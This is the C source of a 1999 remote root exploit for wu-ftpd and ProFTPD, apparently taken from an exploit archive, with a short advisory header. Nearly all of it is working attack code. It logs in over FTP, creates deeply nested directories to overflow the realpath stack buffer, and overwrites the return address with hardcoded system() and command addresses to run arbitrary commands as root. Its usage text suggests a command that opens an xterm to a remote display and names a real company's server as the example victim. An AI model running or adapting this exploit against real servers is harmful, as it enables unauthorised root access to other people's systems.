/* source: http://www.securityfocus.com/bid/113/info There is a vulnerability in ProFTPD versions 1.2.0pre1 and earlier and in wu-ftpd 2.4.2 (beta 18) VR9 and earlier. This vulnerability is a buffer overflow triggered by unusually long path names (directory structures). For example, if a user has write privilages he or she may create an unusually long pathname which due to insuficient bounds checking in ProFTPD will overwrite the stack. This will allow the attacker to insert their own instruction set on the stack to be excuted thereby elavating their access. The problem is in a bad implementation of the "realpath" function. */ /* * SDI wu-ftpd exploit for Linux (Feb 20, 1999) * * http://www.sekure.org - Brazilian Information Security Team. * * Source by jamez ([email protected]) * c0nd0r ([email protected]) * * This source let you execute commands as root if you have write * access on the ftp server. * * Usage: * * gcc SDI-wu.c -o SDI-wu * * ./SDI-wu host user password dir command type [port] [align] * * host: the victim (ftp.microsoft.com) * user: ftp user with write access (anonymous) * password: the password for the user ([email protected]) * dir: the directory you have access (/incoming) * command: the command ("/usr/X11R6/bin/xterm -display www.host.com:0") * type: system type (see below) * port: ftp port (21 default) * align: the alignment (default 3) * * * Limitations: * * because I've used hard coded address's for system and the command, * the values wont be the same in others compilations of wu-ftpd. * so, you will need to find the address for the version * you want to exploit. * * because we are not using the stack to put our code, the exploit * will work as well against a non-executable stack patch. * * * RECOMENDATION = Please, run gdb through the wu.ftpd binary in order to * find out your "system address" (ie: print system) and write it down * so you can have more address to try - just overwrite the default addr * and choose type (3). * * * Thanks for the sekure SDI: * fcon, bishop, dumped, bahamas, slide, vader, yuckfoo. * * Also thanks for #uground (irc.brasnet.org) and * chaosmaker, c_orb(efnet) * */ #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <stdio.h> #include <arpa/inet.h> #define MAXLEN 255 #define BSIZE 1024 struct sockaddr_in sa; struct hostent *he; char c = 'A'; char host[255], user[255], pass[255], command[1024], buff[2040], tmp[3060], netbuf[2040], dir[255]; int sd, i, offset = 0, dirsize = 0, port=21, doit = 0, done = 0, todo = 0, align = 3, tipo = 0; /* CUSTOM ADDRESS, CHANGE IT IN ORDER TO EXPLOIT ANOTHER BOX */ #define SYSADDR 0x40043194; #define EGGADDR 0x805f1dc; long systemaddr; long shelladdr; void usage(char * s) { printf(" \nSDI wu-ftpd remote exploit (http://www.sekure.org)\n\n"); printf(" %s host user password dir command [port] [align]\n\n", s); printf(" host: the victim (ftp.microsoft.com)\n"); printf(" user: ftp user with write access (anonymous)\n"); printf(" password: the password for the user ([email protected])\n"); printf(" dir: the directory you have permission to write (/incoming)\n"); printf(" command: the command (\"/usr/X11R6/bin/xterm -display www.host.com:0\")\n"); printf(" type: see below\n"); printf(" port: ftp port (21 default)\n"); printf(" align: the alignment (3 default)\n"); printf("\n type:\n 0 - slak3.4 ver 2.4(4)\n 1 - slak3.4 ver beta-15&18"); printf("\n 2 - slak3.3 ver 2.4(2)"); printf("\n 3 - custom (change the code)\n\n See Netect advisory - "); printf(" this is not suppose to be released soon! (Feb,1999)\n\n"); } void get_dirsize() { strcpy ( tmp, "PWD"); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); read ( sd, netbuf, sizeof(netbuf)); for(i = 0; i < strlen(netbuf); i++) if(netbuf[i] == '\"') break; dirsize = 0; for(i++; i < strlen(netbuf); i++) if(netbuf[i] == '\"') break; else dirsize++; bzero ( &netbuf, sizeof(netbuf)); } int main (int argc, char *argv[]) { if (argc < 7) { usage(argv[0]); exit(0); } sprintf(host, "%s", argv[1]); sprintf(user, "%s", argv[2]); sprintf(pass, "%s", argv[3]); sprintf(dir, "%s", argv[4]); sprintf(command, "%s", argv[5]); tipo = atoi (argv[6]); printf ( "%d\n\n", tipo); if ( argc > 7) port = atoi(argv[7]); if ( argc > 8) align = atoi(argv[8]); if (tipo <= 0) { /* 2.4(4) libc5 slack 3.4 */ systemaddr = 0x400441f0; shelladdr = 0x80604a0; } else if (tipo == 1) { /* beta 15 libc5 slack 3.4 */ systemaddr = 0x400441f0; shelladdr = 0x8062510; } else if (tipo == 2) { /* 2.4(4) libc5 slack 3.3 */ systemaddr = 0x400441f0; shelladdr = 0x805f1e4; } else { /* CUSTOM ADDRESS */ systemaddr = SYSADDR; shelladdr = EGGADDR; } sd = socket ( AF_INET, SOCK_STREAM, 0); sa.sin_family = AF_INET; sa.sin_port = htons(port); he = gethostbyname (host); if (!he) { if ( (sa.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) { printf ( "wrong ip address or unknown hostname\n"); exit(0); } } else { bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length); } if ( connect ( sd, (struct sockaddr *) &sa, sizeof(sa)) < 0) { printf ( "Cannot connect to remote host: Connection refused\n"); exit(0); } read ( sd, netbuf, sizeof(netbuf)); printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf)); /* ok. we're connected. */ strcpy ( tmp, "USER "); strcat (tmp, user); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp)); read ( sd, netbuf, sizeof(netbuf)); printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf)); /* ok. send the pass. */ strcpy ( tmp, "PASS "); strcat (tmp, pass); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp)); read ( sd, netbuf, sizeof(netbuf)); if ( netbuf[0] == '5') { printf ("Login incorrect!\n"); exit(0); } printf ( "%s\n", netbuf); #ifdef DEBUG printf ( "Ok, we're on! Press any key to exploit it\n"); gets(netbuf); #endif bzero ( &netbuf, sizeof(netbuf)); /* ok. let's get to the vulnerable dir */ strcpy ( tmp, "CWD "); strcat (tmp, dir); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp)); read ( sd, netbuf, sizeof(netbuf)); printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf)); get_dirsize(); /* gets home dir size */ todo = BSIZE - dirsize - 60 - 4; /* ok, we're on. let's get things working here! */ while(done < todo) { if((todo - done) > 255) doit = 255; else doit = todo - done; for (i = 0; i < doit; i++) buff[i] = c; buff[doit] = '\0'; strcpy ( tmp, "MKD "); strcat ( tmp, buff); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); read ( sd, netbuf, sizeof(netbuf)); if ( netbuf[1] == '2') { printf ("error while creating the dir, let's try another name...\n\n"); c++; continue; } else done += doit; bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf)); strcpy ( tmp, "CWD "); strcat ( tmp, buff); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); read ( sd, netbuf, sizeof(netbuf)); if ( netbuf[0] == '5') { printf ("error while exploiting the remote host: Cannot cd dir!\n\n"); } bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf)); } /* prepare last one */ memset(buff, 'X', MAXLEN); for(i = align; i < 100; i += 4) { buff[i ] = systemaddr & 0x000000ff; buff[i+1] = (systemaddr & 0x0000ff00) >> 8; buff[i+2] = (systemaddr & 0x00ff0000) >> 16; buff[i+3] = (systemaddr & 0xff000000) >> 24; } buff[i++] = shelladdr & 0x000000ff; buff[i++] = (shelladdr & 0x0000ff00) >> 8; buff[i++] = (shelladdr & 0x00ff0000) >> 16; buff[i++] = (shelladdr & 0xff000000) >> 24; strcat(command, ";"); memcpy(buff+140, command, strlen(command)); buff[MAXLEN] = '\0'; strcpy ( tmp, "MKD "); strcat ( tmp, buff); strcat ( tmp, "\n"); write ( sd, tmp, strlen(tmp)); read ( sd, netbuf, sizeof(netbuf)); bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf)); /* ok. */ printf ( "Exploiting %s\n", dir); printf ( "Using 0x%x(system) and 0x%x(command), alignment = %d, port = %d\n", systemaddr, shelladdr, align, port); printf("\nI guess you're a hax0r now :D.\n"); close (sd); }